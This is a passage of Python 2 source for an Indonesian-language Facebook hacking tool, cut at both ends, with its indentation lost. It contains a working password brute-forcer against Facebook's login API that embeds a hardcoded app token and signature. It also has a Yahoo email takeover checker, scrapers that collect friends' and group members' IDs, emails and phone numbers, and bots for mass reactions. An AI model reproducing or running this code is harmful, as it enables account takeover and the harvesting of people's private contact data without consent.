print '\x1b[1;91m[+] \x1b[1;92mJumlah\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mMencoba \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mIngin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Dari teman facebook'
print '\x1b[1;37;40m2. Gunakan File'
print '\x1b[1;31;40m0. Kembali'
print
yahoo_pilih()
def yahoo_pilih():
go = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Jangan kosong'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak ada'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(teman.text)
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Ambil ID teman'
print '\x1b[1;37;40m2. Ambil ID teman dari teman'
print '\x1b[1;37;40m3. Ambil ID member GRUP'
print '\x1b[1;37;40m4. Ambil Email teman'
print '\x1b[1;37;40m5. Ambil Email teman dari teman'
print '\x1b[1;37;40m6. Ambil No HP teman'
print '\x1b[1;37;40m7. Ambil No HP teman dari teman'
print '\x1b[1;31;40m0. Kembali'
print
grab_pilih()
def grab_pilih():
cuih = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Jangan kosong'
grab_pilih()
else:
if cuih == '1':
id_teman()
else:
if cuih == '2':
idfrom_teman()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_teman()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_teman()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mTidak ada'
grab_pilih()
def id_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def idfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def emailfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(emfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def hpfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hpfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Bot Reactions Target Post'
print '\x1b[1;37;40m2. Bot Reactions Grup Post'
print '\x1b[1;37;40m3. Bot Komen Target Post'
print '\x1b[1;37;40m4. Bot Komen Grup Post'
print '\x1b[1;37;40m5. Mass delete Post'
print '\x1b[1;37;40m6. Terima permintaan pertemanan'
print '\x1b[1;37;40m7. Hapus pertemanan'
print '\x1b[1;31;40m0. Kembali'
print
bot_pilih()
def bot_pilih():
bots = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Jangan kosong'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mTidak ada'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
